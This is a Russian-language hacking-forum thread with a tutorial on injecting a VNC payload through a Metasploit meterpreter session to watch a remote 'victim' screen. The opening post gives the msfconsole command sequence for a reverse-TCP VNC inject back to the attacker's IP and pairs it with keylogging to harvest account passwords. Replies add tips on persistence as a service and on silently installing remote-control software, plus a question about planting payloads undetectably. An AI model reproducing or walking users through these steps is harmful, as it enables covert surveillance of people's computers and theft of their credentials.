Захват VNC сессии на удаленном компьютере.

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 7 сен 2016.

  1. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.658
    Привет! Здесь пойдет речь о том как использовать VNC -сервер на удаленном компьютере. Что такое VNC и зачем он нам нужен? Немного теории:

    Virtual Network Computing (VNC) — система удалённого доступа к рабочему столу компьютера, использующая протокол RFB (Remote FrameBuffer, удалённый кадровый буфер). Управление осуществляется путём передачи нажатий клавиш на клавиатуре и движений мыши с одного компьютера на другой и ретрансляции содержимого экрана через компьютерные сети.

    Сразу оговорюсь, что запущенный через шелл meterpreter’a VNC – сервер, к сожалению не позволит нам управлять этим компьютером.

    Вместо этого мы сможем наблюдать за действиями на мониторе жертвы, вовремя делать скриншоты экрана, собирая интересную информацию, параллельно включив кейлоггер, добывать пароли именно от интересующих нас аккаунтов и т.д.

    Приступим, как обычно, перед началом всех манипуляций открываем сессию meterpreter с повышенными привилегиями,

    Захват VNC сессии на удаленном компьютере.

    (с базовыми получалось на Windows 7. Win 8.1 и 10 только с повышенными), и пишем по порядку, нижеследующее:

    > use windows/manage/payload_inject

    > set payload windows/vncinject/reverse_tcp

    > set LHOST 192.168.0.18 (IP атакуещего)

    > set session 2 (Номер вашей сессии с привилегиями)

    > set handler true

    > exploit

    Захват VNC сессии на удаленном компьютере.

    Убеждаемся, что все идет успешно:

    Захват VNC сессии на удаленном компьютере.

    В результате этих действий будет открыто окно VNC – сервера:

    Захват VNC сессии на удаленном компьютере.

    На этом все, вопросы и пожелания жду в комментариях.
     
    #1 Vander, 7 сен 2016
    Последнее редактирование: 7 сен 2016
    id2746, ghost, BaJIepraH и 2 другим нравится это.
  2. z3RoTooL

    z3RoTooL Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    28 фев 2016
    Сообщения:
    490
    Симпатии:
    309
    збс, лес как у меня на обоях :)
     
  3. IronBird

    IronBird Member

    Репутация:
    0
    Регистрация:
    14 авг 2016
    Сообщения:
    14
    Симпатии:
    7
    Так может это и твой стол?)
     
    Vander нравится это.
  4. z3RoTooL

    z3RoTooL Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    28 фев 2016
    Сообщения:
    490
    Симпатии:
    309
    точно :) спалился
     
  5. Алёша

    Алёша New Member

    Репутация:
    0
    Регистрация:
    15 сен 2016
    Сообщения:
    1
    Симпатии:
    0
    кто нибудь знает как беспалевно вживить payload на постоянно?
     
  6. WebWare Team

    WebWare Team Администратор
    Команда форума

    Репутация:
    1
    Регистрация:
    30 дек 2015
    Сообщения:
    692
    Симпатии:
    615
    Алексей, здравствуйте. Тема форума Этичный хакинг и тестирование на проникновение.
     
    Vander нравится это.
  7. Triton

    Triton Active Member

    Репутация:
    0
    Регистрация:
    1 окт 2016
    Сообщения:
    44
    Симпатии:
    38
    В отрытой сессии пейлоада:
    Пропишет нагрузку как сервис.
    Справка:
     
    m0tion нравится это.
  8. Ishikawa

    Ishikawa マエストロ
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    15 ноя 2016
    Сообщения:
    124
    Симпатии:
    163
    Под винду можно LiteManager Server ставить с ключем /silent
    Устанавливается тихо, отрывает TCP 5650, сам ставится в accept firewall
    И можно не только смотреть, но и управлять, режимов масса.
     
    kot-gor, BaJIepraH и Vander нравится это.
  9. OmeN

    OmeN New Member

    Репутация:
    0
    Регистрация:
    21 мар 2017
    Сообщения:
    1
    Симпатии:
    0
    я не понял .. куда вводить эти команды ? в терменал Кали ? ввожу use windows/manage/payload_inject - пишет bash: use: command not found . И как открыть сессию meterpreter с повышенными привилегиями ?
     
  10. ghostphisher

    ghostphisher гарант codeby
    Команда форума Grey Team

    Репутация:
    2
    Регистрация:
    7 дек 2016
    Сообщения:
    1.605
    Симпатии:
    1.488
    Это надо вводить в msf консоль
    сначало msfconsole запускаем.
     
  11. asshole

    asshole Member

    Репутация:
    0
    Регистрация:
    25 мар 2017
    Сообщения:
    8
    Симпатии:
    1
    Вопрос нуба: ip атакующего это ip жертвы?(вряд ли) если нет, то какие данные жертвы? просто не понял, какая из команд отвечает за ввод данных жертвы?
     
  12. DSW

    DSW Well-Known Member

    Репутация:
    0
    Регистрация:
    20 мар 2017
    Сообщения:
    69
    Симпатии:
    20
    set LHOST ip атакующего это твой ip например 192.168.1.100
    ip жертвы это тот кого собираешься атаковать например 1.1.1.1
     
  13. asshole

    asshole Member

    Репутация:
    0
    Регистрация:
    25 мар 2017
    Сообщения:
    8
    Симпатии:
    1
    use windows/manage/payload_inject

    > set payload windows/vncinject/reverse_tcp

    > set LHOST 192.168.0.18 (IP атакуещего)

    > set session 2 (Номер вашей сессии с привилегиями)

    > set handler true

    > exploit

    Какая команда указывает жертву?
     
  14. DSW

    DSW Well-Known Member

    Репутация:
    0
    Регистрация:
    20 мар 2017
    Сообщения:
    69
    Симпатии:
    20
    Я тут молец ступил,полуается что set LHOST 192.168.0.18 это тот кого атакуем
     
  15. asshole

    asshole Member

    Репутация:
    0
    Регистрация:
    25 мар 2017
    Сообщения:
    8
    Симпатии:
    1
    Спс. Ip серый или белый?
     
  16. Chena

    Chena Member

    Репутация:
    0
    Регистрация:
    10 фев 2017
    Сообщения:
    12
    Симпатии:
    4
    Ну что я могу сказать . Статья стоит своего Хозяина , а хозяин статьи молодец )
     
  17. Dmitry88

    Dmitry88 Well-Known Member

    Репутация:
    0
    Регистрация:
    29 дек 2016
    Сообщения:
    79
    Симпатии:
    82
    Подниму старую тему. Не могу побороть вин7 х64. "VNC closed connection" , пейлоад отрабатвывает нормально, а вот подключиться не могу. Утром тестил на х32 все отлично было. Потом пару раз запускал на х64.

    Код (Text):
    Executing the VNC agent with endpoint 10.10.ххх.ххх:4545...

    TigerVNC Viewer 64-bit v1.7.0
    Built on: 2017-04-09 14:55
    Copyright (C) 1999-2016 TigerVNC Team and many others (see README.txt)
    See http://www.tigervnc.org for information on TigerVNC.
    meterpreter >
    Fri Jun 23 16:46:45 2017
    DecodeManager: Detected 2 CPU core(s)
    DecodeManager: Creating 2 decoder thread(s)
    CConn:       connected to host 127.0.0.1 port 5900
    CConn:       End of stream
    И все. подключиться не могу.
     
Загрузка...

Поделиться этой страницей